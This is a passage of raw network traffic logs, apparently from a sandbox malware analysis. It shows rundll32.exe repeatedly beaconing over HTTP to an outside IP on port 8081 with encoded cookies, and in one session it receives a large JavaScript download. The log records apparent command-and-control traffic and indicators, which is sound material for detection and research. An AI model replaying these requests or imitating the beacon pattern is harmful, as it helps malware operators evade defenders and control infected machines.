              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:00.308274984 CEST | 2184 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:00 GMT
              Server: cloudflare
              Content-Length: 2266
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              27 | 192.168.2.7 | 49809 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:04.089521885 CEST | 2772 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rpXGOiJtxOo5v5X9FGH20vVZacQGaQ_tNaRp28lLhvVOFVvuUsZycmE_B9wOXvM_1jkulIhBcUNy4cblYfK7UqEC4_jKwFiAhSex1M6jpXxeXz7gOr7dCNwst-b9L4TeXqofdsdP0QeJfLCmgVgphV8F9T82jPkoQ-K5XQoEs9eo2rh2
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:04.119318008 CEST | 2772 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:04 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              28 | 192.168.2.7 | 49810 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:08.688164949 CEST | 2812 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n7DjpjrZlwg4hWmndT70b8j3VYRo7Qw5H1IqFLpT7BLsWmXXDycTPd2PjiUAzaFqsizeTEEWcKKaNYJM4nXqxYUZHyGrcN0II64lJxrLLfC1eAayqz3FXJeKY28A9a9Xau_Hsd-8FQwBdoCgaC-SDi4Bv4wirhdQDwQYSkCjPBfx7apG
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:08.717215061 CEST | 2812 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:08 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              29 | 192.168.2.7 | 49811 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:09.293232918 CEST | 2816 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ykuj-0e8HOtej3RE4FCEhBwLVaKHuU7YNWVAfJBLoCVl6Fi0xoCOpJcKDtzHIM6ftQ4mz-XVBsuHISfhfIdLZBpApbelaLSJVWKDAgI7Ffp8piNQuCqWVXEFqrUGNWbsv-X7gv3dmpHfe1KMM_3mb7EF4ukrSWsTfjRoVv-EHOeo5sXU
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:09.323286057 CEST | 2816 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:09 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              3 | 192.168.2.7 | 49743 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:11.408258915 CEST | 1463 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=Q5hpQs5v1lLXXL79aYNOPZXYnxsOaoRhvLaKxRmYapzsO5INT1NEHR7ZxGVO8wQmPN3sdmwGzHIO8u1Y9VSB3ZOTbw4su34w3LFJu4vo30P1denpMflc7PjWYAyP5qxVNjYxO3QOUChWqJg1ui4s1jjWKFCimqGq9-ei73ZX1l4hNQ9t
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:11.439152956 CEST | 1463 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:11 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              30 | 192.168.2.7 | 49815 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:13.824549913 CEST | 2865 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zTRrtkHMaWZaHjhxd8BbXpb4xEhlyKJhVgXEV6rqK3kttPZiMWff_gKeqlBt_16ztZiDGOvg3M8RQGtpAlMW3sKjTnSpYfUM5oYcWK0CCPA9_pNsWR9whL-NGmqejilSPQuy-qTufIvq3R0q4vmECTykWLNVLVSkIEMU0WmlHlvLexX6
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:13.855338097 CEST | 2866 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:13 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              31 | 192.168.2.7 | 49818 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:16.896758080 CEST | 2872 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=3KDMj3nJuCF7lUaONi7bRovneq0r_SMQXEIFPflDwzuvSkr-TDc8FJ6foQxD3Y5D8TzxZQIGX4vZJa1loWXF7MYJMAjoYPIhYL4KDlnbAtn2aCmb6C3qddSaTEZD5YB-Kf_omJysOiVCZq-JKz-9J20RkKVhvjh5TBQ3YwOzEz6y_YVv
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:16.926899910 CEST | 2873 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:16 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              32 | 192.168.2.7 | 49821 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:17.310132027 CEST | 2881 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ButdX4sc4k-SL4rgLPB6INCrqwZLGbB8-cW-2FzrXoGpSKYQCiBwAFuq8HgLgDA7ea7Yayl1-G9LgdlFsCe1wNbgWxNpyEotmcJ9ps6b616wBt30dIpo8b2lVBHKlZhIc0UFJjF9ZDUT26wo_10Yy32lHE3n6ZW3spSW8jMk4kNkRjtw
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:17.338299990 CEST | 2881 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:17 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              33 | 192.168.2.7 | 49836 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:19.249026060 CEST | 5931 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=XnpmP9KCZO_JUDX45I5W1wW2ycH2hq_oxUvJ3jmkJvC--vvroinSd5HQp9n-sVM6JtaOkXiu0UaCDmbgkR0bV1HtQ_06L_iFdcgR0T5MBXmusJ7lylF9DSzDF-MNwCTbrkW_czegcQJ5kxCjcbeJgK_qVTrGY1ktsw0ZWPrrE9JYNRhz
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:19.281894922 CEST | 6335 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:19 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              34 | 192.168.2.7 | 49850 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:22.872272015 CEST | 6956 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-j9zHHfIzAxu-6Sj0CRUYyx_hUW3zZ4_BRGQm6A_cMJVnIhT9vReQ6d-3jv3VB54hXr2KNWh1iy3VfcGTPObgyo0dVCVHGRuZRZT5TJPxR1M0vO3iF5GskFxelI2QbYLj5ErZc2pSnbvD4JrA4k2iIFxMg4bPbv0TkC4sc_wzACYkhUz
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:22.900567055 CEST | 6956 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:22 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              35 | 192.168.2.7 | 49851 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:24.558878899 CEST | 6960 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=unjm4h8RkkwdTWzjUPbxK-0_UMBNJQl9OpovUJ-b6VbJkmCTKu8WefhHi2ElBaQul-TbCGTedea__YcIx73vgaDRGmWOuNhMBmYgYz8DKLSQsAP2jvXAGLJCZislPaoTTyfC9fp0EEgkvoXkTeeXSgvJusgHZhIUKswdDmVrOVPUJa8C
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:24.588365078 CEST | 6960 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:24 GMT
              Server: cloudflare
              Content-Length: 2245
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              36 | 192.168.2.7 | 49852 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:27.968198061 CEST | 6964 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-s7y9nY28CZt5KExQDrCHqECXQhSMjshYf9dF50QsjkaTm8iBp1GvjVkMxBaBcfzgmIaWNwaRY8muvIpNamPnvVZ1zSem2xM0XyFGJr4kbAKBAosbuXpxIh3gyqpdLASCvErupMU5cvdJ4Rq1QMdSQtewfNi183kF7mNkV5fhxv8gYy6
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:27.998080969 CEST | 6964 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:27 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              37 | 192.168.2.7 | 49853 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:28.636547089 CEST | 6967 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=k_1myR4K2dkHObF2ueZBtkW9kJDeD4vqbNOFTsn9ZRc8Xp2GnzZLls68y-6elgut7Ljj_bxjw_nel-LTJTGOVkP2YIX83nG7DNRGMFuN0MglEOZi4ZxTZyizb4dfg6Pe5lM-sKRrX6OGzZe-aksjXeizJ9ty_64hJ4KtZKYy2dXxUADm
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:28.665497065 CEST | 6968 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:28 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              38 | 192.168.2.7 | 49854 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:30.609291077 CEST | 6971 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8_dwoFaeBA5UwvqhGXlnaaSwxoIEqp8_cxW5EtYUfxSAHfbRY2CAO7HIHSNsijJs3mtNSi1R46T2chFKjjJ5w-lejCfHN04OT-m2IXaMvvbZP5W0x3pWWvvN8GlssjxRBqhUt7P7hgptMROmBGgBCEJGLIpO6YRWY0OLTCzkrxGdqjlA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:30.638292074 CEST | 6972 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:30 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              39 | 192.168.2.7 | 49855 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:35.877868891 CEST | 6975 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=mMjIihQwyloP4ptNIjz4YsMEZ3QwNAFdA_lna_8WiEV4SFVeZJt8wldiCWw4A_2P4GQgJL4cf_NEvMhVV6-14pdf7Uj8nVYws3q_ZPj-q8xoAjBQDOPTuOpxuVbLcopuaPcRxvES37e_Ib4WtwUnNWlY-48A0feYdb-37TxZvWeeh7bG
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:35.905204058 CEST | 6975 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:35 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              4 | 192.168.2.7 | 49744 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:18:14.405805111 CEST | 1466 | OUT | GET /Register/v7.19/UJCIF1N2 HTTP/1.1
              Accept: application/json, application/xhtml+xml, image/*
              Accept-Language: zh-cn
              Accept-Encoding: identity, br
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:14.433989048 CEST | 1467 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:14 GMT
              Server: gsw
              Content-Length: 264862
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              40 | 192.168.2.7 | 49856 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:36.783020973 CEST | 6979 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aOtv7-Uc0P_8L7hQQvBIkL6rmbYlGYLMl8WMaDLrbDHHSJSgZCBCsDWqwshlgAKLF67q20d1yt8lgev13ieHcLjgaaMHyHid98JPFqCb2e7eBu9EGopaQdOlZqGklar4HUU3ll99VoV9256YkV0qexOlLv2J6acH3JSkQl0k0PMKRgnA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:36.817608118 CEST | 6979 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:36 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              41 | 192.168.2.7 | 49857 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:38.423207998 CEST | 6982 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=9iHDV1NIt_lRFElWHK_UnqFmdXUBfCzIdsMK5dPCzOOFy0UmZrYzzLQertRpXIGb273-vSiHUFPzpKK9i-TKNOyIP9DC4f35Sj8F1nNaDQHc6SZDwqzlrf4bQ55pZI-mA37nQLYtNf1o56BRAb6y_0eQn31LPzehZpU4uykyHOaYfIq3
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:38.452397108 CEST | 6983 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:38 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              42 | 192.168.2.7 | 49858 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:42.577856064 CEST | 6986 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n1yu4hKrEfILmHldtUeJnUkcWLvSrkPBYHJNZcVcrTww_1Wtk5eDvcIdA8WSN8OG4Bkr1rDCC9LSNir4KZBGfU9XqK7wf7mQAHWOG1csGOMpsS5J7T2bTCQSp6xTImv16vL2m6jKl4iKbF-VZurrduQS7_B-XmYKKyNlT6qTEf798cjN
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:42.605875015 CEST | 6987 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:42 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              43 | 192.168.2.7 | 49859 | 185.93.6.31 | 8081 | C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:44.763567924 CEST | 6990 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=g0eC4A-_gDAUbdEnObOyCNiLLR4ru0s3GHYtAeSZwi9jxx80fxQ2qEztQwYjjLfl--tqTqWTNZlfM4I_TCD_iIzQpyLnEhxaqPX1DuNx4aZzjXo6F2yZ0vH-8zzQ_cAEc3hbrOqdld2krvR8rIptX3LXseUbXr3ybjD9hyfW9w2FCPys
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:44.794364929 CEST | 6991 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:44 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 44 | Source IP: 192.168.2.7 | Source Port: 49861 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:45.999237061 CEST | 7002 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=oIPDnwXqtzEHtkmeSg3UVvfEdb1X3iwAIGEKLYVgzCvTaUXuMBQzBOK8rhw__oFTjR_-dX4lUJulBqJ13UbK_LoqPxiUQ_0xHJ0FHiX4DcmKSyaLlA7lZai5Q1Y_xo9uVdzniOCPNTU-RaCZVxyyNxEyn7UdnTdpMDc4c3-QHC7O3op_
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:46.028431892 CEST | 7003 | IN | HTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:46 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session ID: 45 | Source IP: 192.168.2.7 | Source Port: 49865 | Destination IP: 185.93.6.31 | Destination Port: 8081 | Process: C:\Windows\System32\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Sep 25, 2021 20:19:50.908303976 CEST | 7019 | OUT | GET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
